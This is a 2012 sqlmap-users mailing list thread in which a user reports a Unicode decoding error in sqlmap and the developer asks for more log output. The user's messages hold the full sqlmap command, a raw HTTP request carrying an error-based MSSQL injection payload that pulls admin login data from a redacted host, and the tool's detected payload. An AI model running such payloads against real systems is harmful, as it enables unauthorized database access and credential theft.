Hi,

This is how I started sqlmap:

./sqlmap.py -r target.txt -p vulnParameter --sql-query "SELECT value, 
value, value, valueg, value FROM table WHERE value = 'admin'" 
--dbms="microsoft sql server" --risk=2 -v 6

And this is a bit more output. The decoding error occurs on each request.

And the final output is

SELECT value, value, value, valueg, value FROM table WHERE value = 
'admin' [1]:
[*] None, None, None, None




Traceback (most recent call last):
   File "/usr/lib/python2.6/logging/__init__.py", line 791, in emit
     stream.write(fs % msg.encode("UTF-8"))
UnicodeDecodeError: 'ascii' codec can't decode byte 0xc3 in position 
9270: ordinal not in range(128)

[15:09:28] [TRAFFIC OUT] HTTP request [#5]:
POST /scripts/XXX/xxx.cfm?CFID=xxxxx&CFTOKEN=xxxxxx HTTP/1.1
Accept-Encoding: identity
Accept-language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) 
Gecko/20100101 Firefox/9.0.1
Accept-charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Host: xxxx.xxxxxxxx.com
Referer: 
https://xxxx.xxxxxxxx.com/scripts/xxx/xxx.cfm?start=0&CFID=xxxxx&CFTOKEN=xxxxx
Cookie: CFID=xxxxx; CFTOKEN=xxxxx; SPRACHE=D; CFID=xxxxx; CFTOKEN=xxxxx
Content-type: application/x-www-form-urlencoded
Connection: close

vulnParameter=alle%27%29%20AND%202946%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28120%29%2BCHAR%28104%29%2BCHAR%2858%29%2B%28SELECT%20TOP%201%20SUBSTRING%28%28ISNULL%28CAST%28sSystembezeichnung%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%29%2C1%2C100%29%20FROM%20Qlogin%20WHERE%20kennung%20%3D%20CHAR%2897%29%2BCHAR%28100%29%2BCHAR%28109%29%2BCHAR%28105%29%2BCHAR%28110%29%20AND%20id%20NOT%20IN%20%28SELECT%20TOP%200%20ISNULL%28id%2CCHAR%2832%29%29%20FROM%20Qlogin%20WHERE%20kennung%20%3D%20CHAR%2897%29%2BCHAR%28100%29%2BCHAR%28109%29%2BCHAR%28105%29%2BCHAR%28110%29%20ORDER%20BY%20id%29%20ORDER%20BY%20id%29%2BCHAR%2858%29%2BCHAR%28102%29%2BCHAR%28119%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%28%27hemb%27%3D%27hemb

Traceback (most recent call last):
   File "/usr/lib/python2.6/logging/__init__.py", line 791, in emit
     stream.write(fs % msg.encode("UTF-8"))
UnicodeDecodeError: 'ascii' codec can't decode byte 0xc3 in position 
9270: ordinal not in range(128)
[15:09:30] [DEBUG] performed 4 queries in 4 seconds
SELECT value, value, value, valueg, value FROM table WHERE value = 
'admin' [1]:
[*] None, None, None, None

[15:09:30] [INFO] Fetched data logged to text files under 
'/home/nso/tools/sqlmap2/sqlmap-dev/output/xxxx.xxxxxxxx.com'

[*] shutting down at 15:09:30

Regards,

Lofi




On Fri, 13 Jan 2012 14:37:19 +0100, Miroslav Stampar wrote:
> Hi.
>
> Could you please send some more details around these lines:
>
> Traceback (most recent call last):
>   File "/usr/lib/python2.6/logging/__init__.py", line 791, in emit
>     stream.write(fs % msg.encode("UTF-8"))
> UnicodeDecodeError: 'ascii' codec can't decode byte 0xc3 in position
> 9270: ordinal not in range(128)
>
> I would need some output from before and after to locate where it
> happens. This way it's impossible to find it.
>
> Kind regards,
> Miroslav Stampar
>
> On Fri, Jan 13, 2012 at 2:05 PM,  wrote:
>
>> Hello,
>>
>> I got this error:
>>
>> Traceback (most recent call last):
>>   File "/usr/lib/python2.6/logging/__init__.py", line 791, in emit
>>     stream.write(fs % msg.encode("UTF-8"))
>> UnicodeDecodeError: 'ascii' codec can't decode byte 0xc3 in position
>> 9270: ordinal not in range(128)
>> [13:58:26] [DEBUG] performed 5 queries in 7 seconds
>> SELECT value, value, value, valueg, value FROM table WHERE value =
>> admin [1]:
>> [*] None, None, None, None, None
>>
>> Injection Type:
>> ---------------
>> ---
>> Place: POST
>> Parameter: vulnParameter
>>     Type: error-based
>>     Title: Microsoft SQL Server/Sybase AND error-based - WHERE or
>> HAVING clause
>>     Payload: vulnParameter=alle) AND
>> 9659=CONVERT(INT,(CHAR(58)+CHAR(112)+CHAR(110)+CHAR(101)+CHAR(58)+(SELECT
>> (CASE WHEN (9659=9659) THEN CHAR(49) ELSE CHAR(48)
>> END))+CHAR(58)+CHAR(112)+CHAR(109)+CHAR(116)+CHAR(58))) AND
>> (bVCQ=bVCQ
>> ---
>>
>> Version:
>> --------
>> ./sqlmap.py --version
>>     sqlmap/1.0-dev (r4668) - automatic SQL injection and database
>> takeover tool
>>     http://www.sqlmap.org
>> [*] starting at 13:59:28
>> sqlmap/1.0-dev (r4668)
>> Python 2.6.5
>>
>> Best regards,
>>
>> Lofi
>>
>>
> 
> ------------------------------------------------------------------------------
>> RSA(R) Conference 2012
>> Mar 27 - Feb 2
>> Save $400 by Jan. 27
>> Register now!
>> http://p.sf.net/sfu/rsa-sfdev2dev2 [2]
>> _______________________________________________
>> sqlmap-users mailing list
>> sqlmap-users@lists.sourceforge.net [3]
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users [4]

